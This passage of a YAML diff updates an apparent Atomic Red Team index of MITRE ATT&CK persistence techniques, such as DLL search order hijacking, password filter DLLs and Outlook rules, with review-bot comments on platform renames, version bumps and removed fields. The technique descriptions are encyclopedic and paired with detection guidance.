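Review bot: T1137's platform list changes from `Office 365` to `Office Suite` and `x_mitre_permissions_required` (`User`, `Administrator`) is removed; the `x_mitre_version` bump from 1.3 to 1.4 matches that, but anything keyed on the literal platform string `Office 365` will stop matching this technique, so the per-platform index outputs should be regenerated and checked in the same PR. The `external_references` block is reordered only: the same seven `source_name` entries with the same URLs appear on both sides.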
@@ -28769,6 +29144,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -28779,6 +29155,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -28787,13 +29164,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
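Review bot: T1098.003 drops `Office 365`, `Google Workspace` and `Azure AD` from `x_mitre_platforms` in favour of `Office Suite` and `Identity Provider` (only `IaaS` and `SaaS` are unchanged). That is a data-model change rather than a timestamp refresh and it decides which platform-specific indexes the technique lands in; call it out in the PR description and verify the generated per-platform index files reflect the new platform names.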
@@ -28835,9 +29212,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -28905,19 +29279,18 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -28933,8 +29306,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28948,7 +29321,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -28974,6 +29347,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
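Review bot: the `Microsoft Security Advisory 2269637` entry in the trailing context reads `Microsoft. (, May 23)` with an empty year. It is pre-existing rather than introduced here, but since this hunk already touches the citation list (the new Hexacorn entry is well-formed and matches the citation added to the description), it is a cheap follow-up to correct upstream.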
@@ -29001,42 +29378,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
@@ -29051,13 +29397,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
@@ -29065,11 +29416,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests: []
T1505.002:
@@ -29100,7 +29474,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
@@ -29138,13 +29512,11 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
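Review bot: T1505.002 drops both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no `3.2.0` replacement, whereas T1574.014 in the same hunk, and T1098.006 and T1053 below, drop only `spec_version` and keep `x_mitre_attack_spec_version: 3.2.0`. T1546.011, T1525 and T1547.005 lose the field the same way later in the diff. Either those objects should keep their attack spec version or the hunk should add the current one; check the generated output for the remaining key on those techniques before merging.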
@@ -29170,7 +29542,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -29212,7 +29584,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -29290,11 +29661,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29374,35 +29744,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -29426,71 +29771,60 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
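Review bot: `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) is removed from T1556.002 and nothing in the new block replaces it, while T1546.011 and T1547.005 keep the field; if anything in this repo filters on permissions required, T1556.002 silently drops out of that view. Separately, most of this hunk is key reordering (the T1505.005 `external_references` are deleted here and re-added in the next hunk with only one URL changed); dumping with a stable key order would reduce the diff to the real changes, namely the `2.0` to `2.1` version bump, `revoked: false` and the `3.2.0` spec version.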
@@ -29499,24 +29833,56 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests: []
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
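Review bot: the `James TermServ DLL` reference now points at `https://x.com/james_inthe_box/status/1150495335812177920` with a new retrieved date of September 12, 2024; a tweet permalink is no more durable under the new domain than under the old one, so an archived copy would be the better target, the way the `Chrome Extension C2 Malware` reference in the next hunk is switched to a `web.archive.org` snapshot. Everything else in the hunk is key reordering around an unchanged `x_mitre_version: '1.0'`.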
@@ -29608,8 +29974,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -29640,71 +30006,139 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests: []
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
